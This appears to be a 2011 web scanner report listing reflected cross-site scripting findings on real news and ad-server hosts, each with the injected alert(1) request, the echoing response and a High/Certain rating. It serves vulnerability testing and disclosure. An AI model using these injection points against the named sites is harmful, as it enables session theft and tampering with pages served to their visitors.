GET /partner_json/search?spn Host: events.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:27:00 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 65 ETag: "c67a6f3fd7c5e670dca Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: d7592b306310903f2491 Z-REQUEST-HANDLED-BY: www23 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 2504 jsp_0('callback({"rsp":{ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.seattlepi |
Path: | /partner_json/search |
GET /partner_json/search?spn Host: events.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:27:09 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 160 ETag: "11474c2ff64583fb593 Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: 67d5f3bd490bd1b411fa Z-REQUEST-HANDLED-BY: www17 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 2381 jsp_09bf95<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.seattlepi |
Path: | /partner_json/search |
GET /partner_json/search?spn Host: events.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:27:05 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 10 ETag: "06aa9b23137fedad3f0 Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: bc3031bbc26db79f807e Z-REQUEST-HANDLED-BY: www19 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 130 {"rsp":{"status":"failed" |
Severity: | High |
Confidence: | Certain |
Host: | http://events.stamfo |
Path: | /partner_json/search |
GET /partner_json/search?spn Host: events.stamfordadvocate Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:23:30 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 128 ETag: "391c8ab5e55cd95b03c Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: 6a065ecdfbb4323f3295 Z-REQUEST-HANDLED-BY: www12 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 3240 jsp_0('callback({"rsp":{ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.stamfo |
Path: | /partner_json/search |
GET /partner_json/search?spn Host: events.stamfordadvocate Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:23:41 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 76 ETag: "938bd31075b7bf46c44 Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: c67e7c296141eccb30cd Z-REQUEST-HANDLED-BY: www21 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 2871 jsp_045b5d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.stamfo |
Path: | /partner_json/search |
GET /partner_json/search?spn Host: events.stamfordadvocate Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 17 Sep 2011 16:23:37 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss, store X-HTTP_CLIENT_IP_O: Access-Control-Allow X-Runtime: 18 ETag: "d24ca5f83bb73fad09c Z-DETECTED-FLAVOR: events_flavor | X-Content-Digest: e9c3a577f1b28442a5ce Z-REQUEST-HANDLED-BY: www30 Cache-Control: max-age=1800, public Set-Cookie: Age: 0 Content-Length: 131 {"rsp":{"status":"failed" |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 17 Sep 2011 16:27:43 GMT Cache-Control: max-age=86400, private Expires: Sun, 18 Sep 2011 16:27:43 GMT X-Proc-ms: 1 Content-Type: application/javascript Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:43 GMT Content-Length: 128 /* * JavaScript include error: * The customer code "F09828AA16E<SCRIPT>ALERT(1)< */ |
Severity: | High |
Confidence: | Certain |
Host: | http://mpd.mxptint.net |
Path: | /1/S74.API/G1/T124/js |
GET /1/S74.API/G1/T124/js?siz Host: mpd.mxptint.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mxpim=optout |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Date: Sat, 17 Sep 2011 16:52:38 GMT Content-Length: 772 document.write('\r\n'); var ftClick = "http://mpc.mxptint.net var ftX = ""; var ftY = ""; var ftZ = ""; var ftContent = ""; var ft300x250_OOBclickTrack = ""; var ftRandom = Math.random()*1000000; var ftBuildTag1 = "<scr"; var ftBuildTag2 = "</"; va ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /naiba219"-alert(1)- Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/naiba219"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /naib43f8"><script>alert(1)< Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.ad.us-ec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai/daa.php60c0f"-alert(1)- Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php60c0f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai/daa.phpd9dc2"><script>alert(1)< Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:07 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.ad.us-ec ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai7256b"-alert(1)- Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai7256b"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai64078"><script>alert(1)< Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai/daa.phpc6148"><script>alert(1)< Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.adserver ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai/daa.phpb222a"-alert(1)- Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpb222a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /naide933"><script>alert(1)< Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:59 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai66562"-alert(1)- Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai66562"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai/daa.php132a8"><script>alert(1)< Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai/daa.phpeadc4"-alert(1)- Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:21 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpeadc4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai8037b"><script>alert(1)< Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai277f9"-alert(1)- Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai277f9"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai/daa.php49125"-alert(1)- Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
